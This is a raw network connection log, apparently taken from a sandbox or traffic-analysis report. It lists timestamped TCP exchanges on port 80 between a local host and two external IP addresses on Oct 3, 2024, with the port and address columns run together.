                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.244669914 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.278179884 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.278179884 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.289350033 CEST80415746082.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.289366007 CEST80415746082.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.492381096 CEST80415746082.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:03.492475033 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:07.507606983 CEST574598041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:07.517631054 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:07.817042112 CEST574598041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.426404953 CEST574598041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.520190954 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.683403015 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.683486938 CEST80415745982.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.683504105 CEST80415745982.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.683558941 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.683703899 CEST574598041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.684138060 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.685818911 CEST80415745982.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.685878038 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.685935020 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:08.688922882 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.315192938 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.315366030 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.315973043 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.317361116 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.320882082 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.322216034 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.604465961 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:09.604795933 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:11.657386065 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:11.666229963 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:11.666341066 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:11.666687012 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:11.895328045 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.207638025 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.721431971 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.721503019 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.724309921 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.724358082 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:12.724384069 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337161064 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337333918 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337749958 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337934017 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.337985039 CEST622098041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.338247061 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.345947981 CEST80416220980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.346826077 CEST80416221080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.346908092 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.347261906 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:13.354641914 CEST80416221080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.016709089 CEST80416221080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.016858101 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.016942024 CEST80416221080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.016999006 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.017488003 CEST622108041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.018177986 CEST622118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.022372961 CEST80416221080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.023139000 CEST80416221180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.023228884 CEST622118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.023437023 CEST622118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.028543949 CEST80416221180.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.028600931 CEST622118041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.068326950 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.073266029 CEST80416221280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.073379040 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.073720932 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.078654051 CEST80416221280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720330000 CEST80416221280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720380068 CEST80416221280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720448971 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720494032 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.720895052 CEST622128041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.721395969 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.725893974 CEST80416221280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.726249933 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.726355076 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.726538897 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:14.731712103 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325179100 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325193882 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325308084 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325359106 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325439930 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325947046 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.325947046 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.326020956 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.326702118 CEST622148041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.327459097 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.327523947 CEST622138041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.331231117 CEST80416221380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.331613064 CEST80416221480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.331722021 CEST622148041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.331991911 CEST622148041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.337447882 CEST80416221480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:16.337519884 CEST622148041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:19.392525911 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:19.397804976 CEST80416221580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:19.397897959 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:19.398196936 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:19.403455973 CEST80416221580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.049864054 CEST80416221580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.049902916 CEST80416221580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.050023079 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.050050020 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.050456047 CEST622158041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.050942898 CEST622168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.055327892 CEST80416221580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.055761099 CEST80416221680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.055960894 CEST622168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.056123972 CEST622168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.061408043 CEST80416221680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.691256046 CEST80416221680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.691292048 CEST80416221680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.691406012 CEST622168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.691729069 CEST622168041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.692332029 CEST622178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.697807074 CEST80416221680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.698416948 CEST80416221780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.698515892 CEST622178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.698676109 CEST622178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.705553055 CEST80416221780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:20.705638885 CEST622178041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:24.741491079 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:24.746779919 CEST80416221880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:24.746876001 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:24.747194052 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:24.752104044 CEST80416221880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.401711941 CEST80416221880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.401814938 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.402067900 CEST80416221880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.402100086 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.402122021 CEST622188041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.402539968 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.407130957 CEST80416221880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.408158064 CEST80416221980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.408227921 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.408420086 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:25.413377047 CEST80416221980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091209888 CEST80416221980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091336966 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091447115 CEST80416221980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091552973 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.091772079 CEST622198041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.092252970 CEST622208041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.097501040 CEST80416221980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.097532988 CEST80416222080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.097664118 CEST622208041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.097786903 CEST622208041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.103751898 CEST80416222080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:26.103831053 CEST622208041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.126152039 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.126611948 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.131810904 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.131927967 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.131989956 CEST80415746082.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.132044077 CEST574608041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.132247925 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.137070894 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.765237093 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.765378952 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.765835047 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.767436028 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.771008015 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:27.772690058 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:28.045919895 CEST80416222182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:28.046000957 CEST622218041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.081899881 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.086891890 CEST80416222280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.087007999 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.087295055 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.093600035 CEST80416222280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.748862028 CEST80416222280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.749026060 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.749383926 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.749875069 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.750161886 CEST80416222280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.750241995 CEST622228041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.762536049 CEST80416222280.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.763137102 CEST80416222380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.763227940 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.763576031 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:29.774400949 CEST80416222380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.418220043 CEST80416222380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.418349028 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.419140100 CEST80416222380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.419153929 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.419220924 CEST622238041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.420006990 CEST622248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.424122095 CEST80416222380.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.425946951 CEST80416222480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.426049948 CEST622248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.426364899 CEST622248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.432240009 CEST80416222480.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:30.432332993 CEST622248041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:31.486123085 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:31.539917946 CEST80416222580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:31.540060997 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:31.540414095 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:31.548336029 CEST80416222580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201339960 CEST80416222580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201406956 CEST80416222580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201423883 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201466084 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.201819897 CEST622258041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.202325106 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.206764936 CEST80416222580.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.207478046 CEST80416222680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.207554102 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.208163023 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.213340044 CEST80416222680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.821655035 CEST80416222680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.821718931 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.821970940 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.822242022 CEST80416222680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.822290897 CEST622268041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.822357893 CEST622278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.826849937 CEST80416222680.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.827199936 CEST80416222780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.827260971 CEST622278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.827326059 CEST622278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.833975077 CEST80416222780.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:32.834022999 CEST622278041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:35.863612890 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:35.869128942 CEST80416222880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:35.869235992 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:35.869623899 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:35.875070095 CEST80416222880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.482870102 CEST80416222880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.483005047 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.483156919 CEST80416222880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.483222008 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.483438969 CEST622288041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.484539986 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.488176107 CEST80416222880.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.489387035 CEST80416222980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.489466906 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.489765882 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:36.494709015 CEST80416222980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114013910 CEST80416222980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114165068 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114212990 CEST80416222980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114278078 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114429951 CEST622298041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.114933014 CEST622308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.119162083 CEST80416222980.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.119858027 CEST80416223080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.119939089 CEST622308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.120109081 CEST622308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.125121117 CEST80416223080.78.24.30192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:37.125180960 CEST622308041192.168.2.780.78.24.30
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.181771040 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.187747955 CEST80416220882.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.187840939 CEST622088041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.200484991 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.205297947 CEST80416223182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.205375910 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.205648899 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.210901022 CEST80416223182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.814863920 CEST80416223182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.814944983 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.815464020 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.820384026 CEST80416223182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.850838900 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.856091976 CEST80416223182.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:41.856157064 CEST622318041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:45.969753981 CEST622328041192.168.2.782.115.223.39
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:45.974689960 CEST80416223282.115.223.39192.168.2.7
                                                                                                                                                                                                                                                Oct 3, 2024 20:45:45.975131989 CEST622328041192.168.2.782.115.223.39
